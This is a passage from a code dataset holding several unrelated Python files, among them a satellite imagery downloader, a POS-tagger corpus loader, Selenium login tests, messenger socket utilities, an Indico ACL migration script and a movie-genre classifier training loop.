catalog = pystac_client.Client.open(\n \"https://planetarycomputer.microsoft.com/api/stac/v1\",\n )\n scenes = catalog.search(**query).get_all_items()\n # break\n if len(scenes) == 0:\n return\n\n scenes_by_orbit = split_by_orbits(scenes)\n all_orbits_bands = []\n profile = {}\n for orbit, scenes in scenes_by_orbit.items():\n # make df from items in orbit\n items_df = pd.DataFrame(scenes)\n items_df.columns = [\"item\"]\n\n items_df = add_cloud_pct(items_df)\n # sort by cloud cover\n items_df = items_df.sort_values(by=\"cloud_pct\", ascending=True)\n # only keep the top 20 scenes\n items_df = items_df[:20]\n items_df = add_tide_height(centroid, items_df, world_tides_api_key)\n # round tide height to nearest 10\n items_df[\"cloud_pct\"] = items_df[\"cloud_pct\"].apply(\n lambda x: round(x / 10) * 10\n )\n # Sort by cloud_pct and then by tide_height\n items_df = items_df.sort_values(\n by=[\"cloud_pct\", \"tide_height\"], ascending=[True, False]\n )\n # download the required bands\n bands, profile = downlaod_bands(items_df, time_steps, required_bands)\n all_orbits_bands.append(bands)\n\n all_orbits_bands = np.array(all_orbits_bands)\n all_orbits_bands = np.moveaxis(all_orbits_bands, 0, 1)\n\n merged_bands = []\n for multi_orbit_bands in all_orbits_bands:\n target_array = np.zeros(multi_orbit_bands.shape[1:])\n for band in multi_orbit_bands:\n target_array[target_array == 0] = band[target_array == 0]\n merged_bands.append(target_array)\n # merged_bands = np.array(merged_bands)\n\n if len(merged_bands) == target_bands:\n export_tif(merged_bands, profile, export_path)\n else:\n print(f\"Failed to download {row.Name}\")\n return export_path\n # break\n\n\ndef download_row(row, tide_key_path, export_dir):\n world_tides_api_key = tide_key_path.read_text().strip()\n\n # %%\n # this is output dir, each scene will end up about 2Gb so make sure you have space!\n export_dir.mkdir(exist_ok=True, parents=True)\n\n # %%\n required_bands = [\"B03\", \"B08\"]\n target_bands = 12\n time_steps = 6\n extract_start_year = 2022\n extract_end_year = 2022\n\n # %%\n\n # %%\n # call download_scene with a thread pool\n # download_scene(s2_grid.iloc[0], target_bands, time_steps, extract_start_year, extract_end_year, export_dir)\n export_path = download_scene(\n row,\n target_bands,\n time_steps,\n extract_start_year,\n extract_end_year,\n export_dir,\n required_bands,\n world_tides_api_key,\n )\n return export_path\n # %%\n","repo_name":"wrignj08/S2Coastline","sub_path":"helpers/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"23654720702","text":"import numpy as np \nimport string \nfrom utils import *\n\n\n# Punctuation characters\npunct = set(string.punctuation)\n\n\ndef load_test_corpus(corpur_url):\n \"\"\"\n Split test corpus\n Input: test_corpus url\n Output:\n - test_words: List of all words in test_corpus\n - y: List of tags according respective with each word in test_words\n \"\"\"\n test_words = []\n y = []\n with open(corpur_url, 'r') as f:\n load = f.readlines()\n for item in load:\n word_tag = item.split()\n if len(word_tag) != 2:\n word = \"--n--\"\n tag = \"--s--\"\n else:\n word = word_tag[0]\n tag = word_tag[1]\n test_words.append(word)\n y.append(tag)\n return test_words, y\n\n\ndef preprocess_list(vocab, test_words_list):\n \"\"\"\n Preprocess out of vocab with (use in case there are no test_corpus .words file)\n Input:\n - Vocab: Dict {word: index}\n - test_word_list: test_words list extracted from calling 'load_test_corpus(corpus_url)' function \n \"\"\"\n origin = []\n processed = []\n for word in test_words_list:\n if not word:\n origin.append(word.strip())\n word = \"--n--\"\n processed.append(word)\n continue\n elif word.strip() not in vocab:\n origin.append(word.strip())\n word = assign_unk(word)\n processed.append(word)\n continue\n else:\n origin.append(word.strip())\n processed.append(word.strip())\n return origin, processed\n\n\ndef preprocess_words(vocab, test_words_file):\n \"\"\"\n Preprocess out of vocab with .words file\n Input:\n - Vocab: Dict {word: index}\n - test_word_file: test_corpus .words file\n \"\"\"\n origin = []\n processed = []\n print(len(vocab))\n with open(test_words_file, \"r\") as data_file:\n for _, word in enumerate(data_file):\n # End of sentence\n if not word.split():\n origin.append(word.strip())\n word = \"--n--\"\n processed.append(word)\n continue\n\n # Handle unknown words\n elif word.strip() not in vocab:\n origin.append(word.strip())\n word = assign_unk(word)\n processed.append(word)\n continue\n\n else:\n origin.append(word.strip())\n processed.append(word.strip())\n return origin, processed\n\n\nif __name__ == \"__main__\":\n words, label = load_test_corpus(\"./data/WSJ_24.pos\")\n print(\"First 50 words in test corpus: \", words[:50])\n print(\"First 50 tags in test corpus: \", label[:50])\n vocab_txt=\"./data/hmm_vocab.txt\"\n vocab = get_index_vocab(vocab_txt=vocab_txt)\n _, test_words = preprocess_list(vocab=vocab, test_words_list=words) \n print(\"First 50 words in test corpus after processing: \", test_words[:30])\n\n","repo_name":"LTPhat/HMM-Viterbi-POS-Tagger","sub_path":"process_test_corpus.py","file_name":"process_test_corpus.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1244457051","text":"from django.conf.urls import patterns, url\nfrom gjsv import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^fetch/(?P.+)/$' ,views.fetch, name='fetch'),\n url(r'^update/(?P.+)/$' ,views.update, name='update'),\n url(r'^editor/$',views.editor, name='editor'),\n \n)\n","repo_name":"monomoti/Leaflet_HandsOn","sub_path":"application/thesite/gjsv/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"34575900037","text":"from test_project.common.singdriver import SingleDriver\ndriver=SingleDriver()\nfrom test_project.business.user import UserAction\nuseraction=UserAction()\n\ndef test_login():\n useraction.user_login('testuser1','123456')\n #添加断言\n #1:登录成功应该跳转到首页\n current_url=driver.current_url\n assert current_url=='http://49.233.108.117:3000/','应该跳转到首页'\n\n #2:用户名应该为testuser1\n username=driver.find_element_by_css_selector('span[class=\"user_name\"]>a[class=\"dark\"]').text\n assert username=='testuser1','登录用户名应该为testuser1'\n\n\n\ndef test_register():\n '''\n 测试注册功能\n :return:\n '''\n useraction.user_register('testuser2','123456','123456','123456@qq.com')\n\n current_url=driver.current_url\n assert current_url=='http://49.233.108.117:3000/signup','应该跳转至注册界面'","repo_name":"jack-fjh/pytest_demo","sub_path":"test_project/testcase/test_user.py","file_name":"test_user.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18879443495","text":"\"\"\"\nGeek University Python-разработки\n\nМессенджер\nОбщие компоненты\n\nУчебный проект к курсу \"Клиент-серверные приложения на Python\".\n\nАвтор: Михаил Духонин\n\nОктябрь - ноябрь 2021\n\n \"\"\"\n\nimport sys\nfrom logging import getLogger\nfrom json import dumps, loads\nfrom common.variables import ENCODING, MAX_SIZE_PACKAGE\nfrom common.decorators import log_func\n\nsys.path.append('..')\n\nimport log_configs.client_log_config\nimport log_configs.server_log_config\n\nif sys.argv[0].find('server') != -1:\n log = getLogger('server')\nelif sys.argv[0].find('client') != -1:\n log = getLogger('client')\nelse:\n print('логгер не найден')\n\n@log_func(log)\ndef connect_data (args):\n \"\"\" Получает список из трёх элементов (командная трока)\n и возвращает кортеж из второго и третьего элемента.\n В них содержатся данные для подключения/прослушивания клиента/сервера (адрес и порт).\n\n \"\"\"\n\n if args and len(args) == 3:\n return (args[1], int(args[2]))\n\n# Если честно, мне откровенно лень заморачиваться с парсингом командной строки.\n# Если реально надо будет сделать соответствующий интерфейс, я лучше заморочусь с аргпарсе.\n\n@log_func(log)\ndef get_msg(sock):\n \"\"\" Получает сообщение из сокета \"\"\"\n\n msg = sock.recv(MAX_SIZE_PACKAGE)\n\n try:\n msg = msg.decode(ENCODING)\n except UnicodeDecodeError:\n raise ValueError('Не utf-8') from UnicodeDecodeError\n\n if len(msg) != 0:\n msg = loads(msg)\n else:\n print(\"Пустая строка\")\n return {}\n\n if isinstance(msg, dict):\n return msg\n else:\n raise TypeError('не словарь')\n\n\n@log_func(log)\ndef send_msg(sock, msg):\n \"\"\" Отправляет сообщение msg в сокет сервера sock. \"\"\"\n\n if isinstance(msg, dict):\n j_msg = dumps(msg)\n else:\n raise TypeError('Сообщение должно быть словарём.')\n\n b_msg = bytes(j_msg, 'utf-8')\n return sock.send(b_msg)\n","repo_name":"velimudrvelimudr/gb_messenger","sub_path":"common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3085891287","text":"# Adapted from:\n#Author: Thomas Wagenaar (t.wagenaar@student.tue.nl)\n#\n# Implementation of the algorithms desribed in the paper \"Improving Robot\n# Controller Transparency Through Autonomous Policy Explanation\" by B. Hayes and\n# J.A. Shah.\n#Original Code Location: https://gitlab.tue.nl/ha800-hri/hayes-shah\n\n\n# Import libraries\nimport json\nimport hayes_shah.hs\nimport time\nimport UMNumber\nimport importlib\nimport operator\n\ndef generatePredicates(failedTask,numberOfAgents):\n isAgent1Apple2 = {\n 'true': 'Agent 1 picked apple 2',\n 'false': 'Agent 1 did not pick apple 2',\n 'verify': lambda s : s['Agent1Apple2'] == '1'}\n\n isAgent1Apple3 = {\n 'true': 'Agent 1 is picked apple 3',\n 'false': 'Agent 1 did not pick apple3',\n 'verify': lambda s : s['Agent1Apple3'] == '1'}\n\n isAgent1Apple1 = {\n 'true': 'Agent 1 picked apple 1',\n 'false': 'Agent 1 did not pick apple 1',\n 'verify': lambda s : s['Agent1Apple1'] == '1'}\n\n\n isAgent2Apple2 = {\n 'true': 'Agent 2 picked apple 2',\n 'false': 'Agent 2 did not picked apple 2',\n 'verify': lambda s : s['Agent2Apple2'] == '1'}\n\n isAgent2Apple3 = {\n 'true': 'Agent 2 picked apple 3',\n 'false': 'Agent 2 did not picked apple 3',\n 'verify': lambda s : s['Agent2Apple3'] == '1'}\n\n isAgent2Apple1 = {\n 'true': 'Agent 2 picked apple 1',\n 'false': 'Agent 2 did not picked apple 1',\n 'verify': lambda s : s['Agent2Apple1'] == '1'}\n\n\n isAgent3Apple2 = {\n 'true': 'Agent 3 picked apple 2',\n 'false': 'Agent 3 did not picked apple 2',\n 'verify': lambda s : s['Agent3Apple2'] == '1'}\n\n isAgent3Apple3 = {\n 'true': 'Agent 3 picked apple 3',\n 'false': 'Agent 3 did not picked apple 3',\n 'verify': lambda s : s['Agent3Apple3'] == '1'}\n\n isAgent3Apple1 = {\n 'true': 'Agent 3 picked apple 1',\n 'false': 'Agent 3 did not picked apple 1',\n 'verify': lambda s : s['Agent3Apple1'] == '1'}\n\n\n if numberOfAgents == 3:\n predicates = [isAgent1Apple2,isAgent2Apple2,isAgent3Apple2,isAgent1Apple3,isAgent2Apple3,isAgent3Apple3,isAgent1Apple1,isAgent2Apple1,isAgent3Apple1]\n\n return predicates\n\ndef taskFailure(targetState,numberOfAgents,failedTask):\n states = []\n actions = []\n one = []\n for i in UMNumber.UMNumberKeys:\n state = i.split(\",\")\n if numberOfAgents == 3:\n holdState = {'Agent1Apple2': '0', 'Agent2Apple2': '0', 'Agent3Apple2': '0','Agent1Apple3': '0', 'Agent2Apple3': '0', 'Agent3Apple3': '0','Agent1Apple1': '0', 'Agent2Apple1': '0', 'Agent3Apple1': '0'}\n if \"True\" in state[0]:\n holdState['Agent1Apple2'] = '1'\n if \"True\" in state[3]:\n holdState['Agent2Apple2'] = '1'\n if \"True\" in state[6]:\n holdState['Agent3Apple2'] = '1'\n if \"True\" in state[1]:\n holdState['Agent1Apple3'] = '1'\n if \"True\" in state[4]:\n holdState['Agent2Apple3'] = '1'\n if \"True\" in state[7]:\n holdState['Agent3Apple3'] = '1'\n if \"True\" in state[2]:\n holdState['Agent1Apple1'] = '1'\n if \"True\" in state[5]:\n holdState['Agent2Apple1'] = '1'\n if \"True\" in state[8]:\n holdState['Agent3Apple1'] = '1'\n states.append(holdState)\n actions.append({'go': 1.0})\n predicates = generatePredicates(\"apple2\",numberOfAgents)\n explainer = hayes_shah.hs.Explainer(states, actions, predicates);\n\n for s in targetState[failedTask]:\n state = s.split(\",\")\n if numberOfAgents == 3:\n holdState = {'Agent1Apple2': '0', 'Agent2Apple2': '0', 'Agent3Apple2': '0','Agent1Apple3': '0', 'Agent2Apple3': '0', 'Agent3Apple3': '0','Agent1Apple1': '0', 'Agent2Apple1': '0', 'Agent3Apple1': '0'}\n if \"True\" in state[0]:\n holdState['Agent1Apple2'] = '1'\n if \"True\" in state[3]:\n holdState['Agent2Apple2'] = '1'\n if \"True\" in state[6]:\n holdState['Agent3Apple2'] = '1'\n if \"True\" in state[1]:\n holdState['Agent1Apple3'] = '1'\n if \"True\" in state[4]:\n holdState['Agent2Apple3'] = '1'\n if \"True\" in state[7]:\n holdState['Agent3Apple3'] = '1'\n if \"True\" in state[2]:\n holdState['Agent1Apple1'] = '1'\n if \"True\" in state[5]:\n holdState['Agent2Apple1'] = '1'\n if \"True\" in state[8]:\n holdState['Agent3Apple1'] = '1'\n one.append(holdState)\n\n return explainer,one\n\n\ndef convertUserQuery(userQuery, failedTask):\n convertedQuery = ''\n timeStep = float('inf')\n completedTask = []\n for i in userQuery.keys():\n if failedTask in userQuery[i]:\n timeStep = userQuery[i].index(failedTask)\n\n for i in userQuery.keys():\n for j in range(0,timeStep+1):\n completedTask.append((int(i[-1]),userQuery[i][j]))\n\n if (1, 'apple2') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (2, 'apple2') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (3, 'apple2') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n\n if (1, 'apple3') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (2, 'apple3') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (3, 'apple3') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n\n if (1, 'apple1') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (2, 'apple1') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n if (3, 'apple1') in completedTask: convertedQuery = convertedQuery + \"1\"\n else: convertedQuery = convertedQuery + \"0\"\n\n return convertedQuery, timeStep\n\ndef updateUserQuery(userQuery,updatingQuery,failedTask,timeStep,numberOfAgents):\n taskMatch = {}\n agentMatch = {}\n\n for i in userQuery.keys():\n if userQuery[i][-1] != \"*\":\n lastTask = userQuery[i][-1]\n convertedUserQuery,_ = convertUserQuery(userQuery,lastTask)\n\n for i in userQuery.keys():\n for j in range(len(userQuery[i])):\n if userQuery[i][j] not in taskMatch.keys():\n taskMatch[userQuery[i][j]] = j\n taskMatch.pop(\"*\")\n\n agentMatch[\"apple2\"] = updatingQuery[0:3]\n agentMatch[\"apple3\"] = updatingQuery[3:6]\n agentMatch[\"apple1\"] = updatingQuery[6:9]\n\n for i in agentMatch.keys():\n if '1' in agentMatch[i] and i != failedTask:\n for k,v in taskMatch.items():\n if v >= taskMatch[i] + 1 and v != failedTask:\n taskMatch[k] += 1\n if taskMatch[i] + 1 > taskMatch[failedTask]:\n taskMatch[failedTask] = taskMatch[i] + 1\n elif \"1\" not in agentMatch[i] and i != failedTask and taskMatch[i] < taskMatch[failedTask]:\n taskMatch[failedTask] = taskMatch[i] - 1\n\n sorted_taskMatch = sorted(taskMatch.items(), key=operator.itemgetter(1))\n taskflag = False\n for k in sorted_taskMatch:\n if k[0] == 'apple2' and taskflag == True:\n agentMatch[k[0]] = convertedUserQuery[0:3]\n elif k[0] == 'apple3' and taskflag == True:\n agentMatch[k[0]] = convertedUserQuery[3:6]\n elif k[0] == 'apple1' and taskflag == True:\n agentMatch[k[0]] = convertedUserQuery[6:9]\n if k[0] == failedTask:\n taskflag = True\n\n sorted_taskMatch = sorted(taskMatch.items(), key=operator.itemgetter(1))\n\n for i in range(len(sorted_taskMatch)):\n task = sorted_taskMatch[i][0]\n agents = agentMatch[task]\n for j in range(len(agents)):\n if agents[j] == '1':\n userQuery[\"agent\"+str(j+1)][i] = task\n else:\n userQuery[\"agent\"+str(j+1)][i] = \"*\"\n\n return userQuery\n\n\ndef genNotPossExp(userQuery, numberOfAgents):\n importlib.reload(UMNumber)\n failedTasks = UMNumber.failedTasks\n targetState = UMNumber.targetState\n for failedTask in failedTasks:\n convertedQuery, timeStep = convertUserQuery(userQuery, \"apple2\")\n convertedQuery, timeStep = convertUserQuery(userQuery, failedTask)\n print(failedTask+\":\")\n explainer,one = taskFailure(targetState,numberOfAgents,failedTask)\n clauses,bestMinterm = explainer.getLanguage(one, convertedQuery,'pick apple',timeStep,numberOfAgents)\n print(clauses)\n userQuery = updateUserQuery(userQuery,bestMinterm,failedTask,timeStep,numberOfAgents)\n print(\"\")\n return userQuery\n\ndef main():\n numberOfAgents = 3\n userQuery = {\"agent1\": [\"*\",\"*\",\"apple2\"], #Not Possible Query\n \"agent2\":[\"apple3\",\"*\",\"apple2\"],\n \"agent3\":[\"apple3\",\"apple1\",\"*\"]}\n #genNotPossExp(userQuery, numberOfAgents)\nmain()\n","repo_name":"kjboggess/ijcai23","sub_path":"LBF Code Pipeline/Code Pipeline/RE_generateNotPossExp_3agTotalQ.py","file_name":"RE_generateNotPossExp_3agTotalQ.py","file_ext":"py","file_size_in_byte":9296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19619914381","text":"from __future__ import unicode_literals\n\nfrom math import ceil\nfrom operator import attrgetter\n\nimport click\nfrom sqlalchemy.orm import joinedload\n\nfrom indico.core.db.sqlalchemy.protection import ProtectionMode\nfrom indico.core.db.sqlalchemy.util.session import no_autoflush\nfrom indico.modules.events import Event\nfrom indico.modules.networks.models.networks import IPNetworkGroup\nfrom indico.modules.users import User\nfrom indico.util.console import verbose_iterator, cformat\nfrom indico.util.struct.iterables import committing_iterator\nfrom indico_zodbimport import Importer\nfrom indico_zodbimport.util import patch_default_group_provider, convert_principal, convert_to_unicode\n\n\nclass EventACLImporter(Importer):\n def __init__(self, **kwargs):\n self.default_group_provider = kwargs.pop('default_group_provider')\n self.parallel = kwargs.pop('parallel')\n self.all_users_by_email = {}\n self.domains_map = {}\n super(EventACLImporter, self).__init__(**kwargs)\n\n @staticmethod\n def decorate_command(command):\n def _process_parallel(ctx, param, value):\n if value is None:\n return None\n n, i = map(int, value.split(':', 1))\n if n <= 1:\n raise click.BadParameter('N must be >1')\n if i not in range(n):\n raise click.BadParameter('I must be in [0..{})'.format(n))\n return n, i\n\n command = click.option('--default-group-provider', required=True,\n help=\"Name of the default group provider\")(command)\n command = click.option('-P', '--parallel', metavar='N:I', callback=_process_parallel,\n help='Parallel mode - migrates only events with `ID mod N = I`. '\n 'When using this, you need to run the script N times with '\n 'I being in [0..N)')(command)\n return command\n\n @no_autoflush\n def migrate(self):\n self.domains_map = {ipng.name.lower(): ipng for ipng in IPNetworkGroup.query}\n all_users_query = User.query.options(joinedload('_all_emails')).filter_by(is_deleted=False)\n for user in all_users_query:\n for email in user.all_emails:\n self.all_users_by_email[email] = user\n\n with patch_default_group_provider(self.default_group_provider):\n self.migrate_event_acls()\n\n def migrate_event_acls(self):\n self.print_step('migrating event ACLs')\n protection_mode_map = {-1: ProtectionMode.public, 0: ProtectionMode.inheriting, 1: ProtectionMode.protected}\n for legacy_event, event in committing_iterator(self._iter_events(), 5000):\n ac = legacy_event._Conference__ac\n self.print_success('', event_id=event.id)\n\n old_protection_mode = protection_mode_map[ac._accessProtection]\n if old_protection_mode == ProtectionMode.public and ac.requiredDomains:\n event.protection_mode = ProtectionMode.protected\n self._migrate_domains(event, ac.requiredDomains)\n else:\n event.protection_mode = old_protection_mode\n\n no_access_contact = convert_to_unicode(getattr(ac, 'contactInfo', ''))\n if no_access_contact != 'no contact info defined':\n event.own_no_access_contact = no_access_contact\n event.access_key = convert_to_unicode(getattr(legacy_event, '_accessKey', ''))\n if not self.quiet:\n self.print_success('Protection mode set to {}'.format(event.protection_mode.name, event_id=event.id))\n for legacy_acl in ac.allowed:\n event_acl = self.convert_acl(legacy_acl)\n if event_acl is None:\n self.print_warning(cformat('%{red}ACL%{reset}%{yellow} does not exist:%{reset} {}')\n .format(legacy_acl), event_id=event.id)\n continue\n event.update_principal(event_acl, read_access=True, quiet=True)\n if not self.quiet:\n self.print_msg(cformat('%{green}[{}]%{reset} {}').format('Event ACL', event_acl))\n\n def _migrate_domains(self, event, old_domains):\n for old_domain in old_domains:\n network = self.domains_map[convert_to_unicode(old_domain.name).lower()]\n event.update_principal(network, read_access=True, quiet=True)\n if not self.quiet:\n self.print_success('Adding {} IPNetworkGroup to the ACLs'.format(network), event_id=event.id)\n\n def convert_acl(self, old_acl):\n acl = convert_principal(old_acl)\n if (acl is None and old_acl.__class__.__name__ in ('Avatar', 'AvatarUserWrapper') and\n 'email' in old_acl.__dict__):\n email = old_acl.__dict__['email'].lower()\n acl = self.all_users_by_email.get(email)\n if acl is not None:\n self.print_warning('Using {} for {} (matched via {})'.format(acl, old_acl, email), always=False)\n return acl\n\n def _iter_events(self):\n event_it = self.zodb_root['conferences'].itervalues()\n events_query = Event.find(is_deleted=False).order_by(Event.id)\n event_total = len(self.zodb_root['conferences'])\n if self.parallel:\n n, i = self.parallel\n event_it = (e for e in event_it if int(e.id) % n == i)\n event_total = int(ceil(event_total / n))\n events_query = events_query.filter(Event.id % n == i)\n all_events = {ev.id: ev for ev in events_query}\n if self.quiet:\n event_it = verbose_iterator(event_it, event_total, attrgetter('id'), attrgetter('title'))\n for conf in self.flushing_iterator(event_it):\n event = all_events.get(int(conf.id))\n if event is None:\n self.print_error(cformat('%{red!}Event not found in DB'), event_id=conf.id)\n continue\n yield conf, event\n","repo_name":"emolenaar/indico","sub_path":"indico_zodbimport/modules/event_acls.py","file_name":"event_acls.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"26906634803","text":"\r\nfrom estop import top, estoping, shortclock\r\nfrom Errors import E300, E550, E400\r\nimport ridemusic\r\nfrom Shutdown import shutdown\r\nimport winsound\r\nimport constants\r\nimport time\r\n\r\ndef resetride():\r\n print(\"\")\r\n ##Reset all looping values to defalt\r\n\r\ndef printsongs():\r\n top()\r\n print(ridemusic.song1n)\r\n print(ridemusic.song2n)\r\n print(ridemusic.song3n)\r\n print(ridemusic.song5n)\r\n print(ridemusic.song6n)\r\n\r\ndef manualmodeen():\r\n\r\n ##Starting values\r\n totalrideload = 0\r\n gyro = True\r\n ridetimer = 5\r\n\r\n riderunning = True\r\n restraintcheck = True\r\n musicq = input(\"Would you like onboard music (y/n): \")\r\n if(musicq == \"y\"):\r\n music = True\r\n elif(musicq == \"n\"):\r\n music = False\r\n elif(musicq == \"4\"):\r\n estoping()\r\n quit()\r\n else:\r\n E300()\r\n quit()\r\n top()\r\n riderunning = True\r\n while(riderunning == True):\r\n resetride()\r\n while(restraintcheck == True):\r\n if(music == True):\r\n printsongs()\r\n musicc = input('Please select music choice (1-2-3-5-6):')\r\n top()\r\n if(musicc == \"1\"):\r\n ridemusic.song1()\r\n elif(musicc == \"2\"):\r\n ridemusic.song2()\r\n elif(musicc == \"3\"):\r\n ridemusic.song3()\r\n elif(musicc == \"5\"):\r\n ridemusic.song5()\r\n elif(musicc == \"6\"):\r\n ridemusic.song6()\r\n elif(musicc == \"4\"):\r\n estoping()\r\n break\r\n riderweight = input(\"Input rider weight:\")\r\n top()\r\n restraints = input(\"Verify Restraints: Press to continue\")\r\n top()\r\n if(restraints == \"5\"):\r\n top()\r\n print(\"Restraints Locked: GREEN to Dispatch\")\r\n restraintcheck = False\r\n elif(restraints == \"4\"):\r\n estoping()\r\n break\r\n elif(restraints ==\"take5\"):\r\n shutdown()\r\n quit()\r\n else:\r\n E300()\r\n break\r\n dispatch1 = input(\"\")\r\n top()\r\n if(dispatch1 == \"31\"):\r\n riderweightint = int(riderweight)\r\n if(constants.maxriderweight >= riderweightint):\r\n print\r\n else:\r\n E550()\r\n estoping()\r\n quit()\r\n if(totalrideload >= constants.allowrideload):\r\n E400()\r\n estoping()\r\n quit()\r\n print(\"## Ride Running\")\r\n restraintcheck = True\r\n while(gyro == True ) and (ridetimer > 0):\r\n print(\"DATA GO\")\r\n time.sleep(1)\r\n ridetimer -= 1\r\n\r\n\r\n\r\n\r\n print(\"##Ride over\")\r\n totalrideload += riderweightint\r\n shortclock()\r\n winsound.PlaySound(None, winsound.SND_PURGE)\r\n top()\r\n elif(dispatch1 == \"4\"):\r\n estoping()\r\n break\r\n elif(dispatch1 == \"y\"):\r\n top()\r\n riderunning = False\r\n else: \r\n E300()\r\n break","repo_name":"EvanOdya/GLCOS","sub_path":"T-25 2.0.0/Manual.py","file_name":"Manual.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"3111360096","text":"import json\nimport logging\nimport time\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom utils import evaluate, setup_logging, setup_seed, setup_device, build_optimizer, build_optimizer_vlbert\nimport tempfile\nfrom sklearn.model_selection import KFold\n\nfrom config import parse_args\nfrom data_helper import create_dataloader, create_dataloader_all\nfrom models.CTT_base1.model import Base1CttMmc\nfrom models.GMU_base2.model import GMU_MGC\nfrom models.base3.model import Base3Moviescope\nfrom models.MFMGC.model import MFMGC\nfrom models.base4.model import Base4\nfrom models.base5.model import Base5\nfrom models.base6.model import Base6\n\n\ndef validation(model, val_dataloader):\n model.eval()\n losses = []\n predictions_01 = []\n raw_predictions = []\n labels = []\n hidden_matrix = []\n with torch.no_grad():\n t_begin = time.time()\n for step, batch in enumerate(val_dataloader):\n loss, accuracy, pred_label_id, raw_prediction, hidden = model(batch)\n\n loss = loss.mean()\n accuracy = accuracy.mean()\n predictions_01.extend(pred_label_id.cpu().numpy())\n raw_predictions.extend(raw_prediction.cpu().numpy())\n labels.extend(batch['label'].cpu().numpy())\n # hidden_matrix.extend(hidden.cpu().numpy())\n losses.append(loss)\n if step % 5 == 0:\n t = time.time()\n logging.info(f\"step={step:4}/{len(val_dataloader)}|\"\n f\"loss={loss:6.4}|acc={accuracy:0.4}|time={t - t_begin:.4}s\")\n t_begin = time.time()\n\n loss = sum(losses) / len(losses)\n metrics = evaluate(predictions_01, labels, raw_predictions)\n return loss, metrics, hidden_matrix\n\n\ndef test_model(args, test_dataloader, model_save, dataloader):\n logging.info('>>> loading model...')\n if args.model_name == 'base1':\n model = Base1CttMmc(args)\n elif args.model_name == 'mymodel':\n model = MFMGC(args)\n elif args.model_name == 'base2':\n model = GMU_MGC(args)\n elif args.model_name == 'base3':\n model = Base3Moviescope(args)\n elif args.model_name == 'base4':\n model = Base4(args)\n elif args.model_name == 'base5':\n model = Base5(args)\n elif args.model_name == 'base6':\n model = Base6(args)\n model_save.seek(0)\n model_dict = torch.load(model_save, map_location='cpu')\n model.load_state_dict(model_dict[0])\n \n if args.device == 'cuda':\n model = torch.nn.parallel.DataParallel(model.to(args.device))\n print('>> using gpu to loading model...')\n \n val_loss, metrics, _ = validation(model, test_dataloader)\n logging.info(f\">>> val_loss: {val_loss}, matrics: {metrics}\")\n hidden_matrix = []\n if args.model_name == 'base6':\n with torch.no_grad():\n for step, batch in enumerate(dataloader):\n loss, accuracy, pred_label_id, raw_prediction, hidden = model(batch)\n hidden_matrix.extend(hidden.cpu().numpy())\n\n hidden_matrix = pd.DataFrame(hidden_matrix)\n print(hidden_matrix.shape)\n hidden_matrix.to_csv('./' + args.modals[0] + '-features-mb.csv', header=False, index=False)\n return metrics\n\n\ndef train_and_validation(args):\n skf = KFold(n_splits=5, random_state=42, shuffle=True)\n labels = pd.read_csv(args.label_path, header=None, index_col=None).values\n args.data_num = len(labels)\n note_log = dict(\n note='-'.join(args.modals), # args.note,\n best_epoch=[0 for _ in range(5)],\n macro=[],\n micro=[],\n weighted_f1=[],\n auc_pr_macro=[],\n auc_pr_micro=[],\n auc_macro=[],\n auc_micro=[],\n )\n for i, (train_val_index, test_index) in enumerate(skf.split(range(args.data_num), labels)):\n if i != 0:\n continue\n print('==================== %d fold ====================' % i)\n train_index = train_val_index[: int(len(train_val_index) * 7 / 8)]\n val_index = train_val_index[int(len(train_val_index) * 7 / 8):]\n # train_index, val_index, test_index = None, None, None\n train_dataloader, val_dataloader, test_dataloader, _, _, _ = create_dataloader(args, train_index, val_index, test_index)\n dataloader = create_dataloader_all(args)\n if args.model_name == 'base1':\n model = Base1CttMmc(args)\n optimizer, schedual = build_optimizer(args, model)\n elif args.model_name == 'mymodel':\n model = MFMGC(args)\n optimizer, schedual = build_optimizer_vlbert(args, model)\n elif args.model_name == 'base2':\n model = GMU_MGC(args)\n optimizer, schedual = build_optimizer(args, model)\n elif args.model_name == 'base3':\n model = Base3Moviescope(args)\n optimizer, schedual = build_optimizer(args, model)\n elif args.model_name == 'base4':\n model = Base4(args)\n optimizer, schedual = build_optimizer(args, model)\n elif args.model_name == 'base5':\n model = Base5(args)\n optimizer, schedual = build_optimizer(args, model)\n elif args.model_name == 'base6':\n model = Base6(args)\n optimizer, schedual = build_optimizer(args, model)\n\n # model_dict = torch.load('./models/CCT_MMC_base1/save/model.bin', map_location='cpu')\n # model.load_state_dict(model_dict['model_state_dict'])\n if args.device == 'cuda':\n model = torch.nn.parallel.DataParallel(model.to(args.device))\n print('>> using gpu to loading 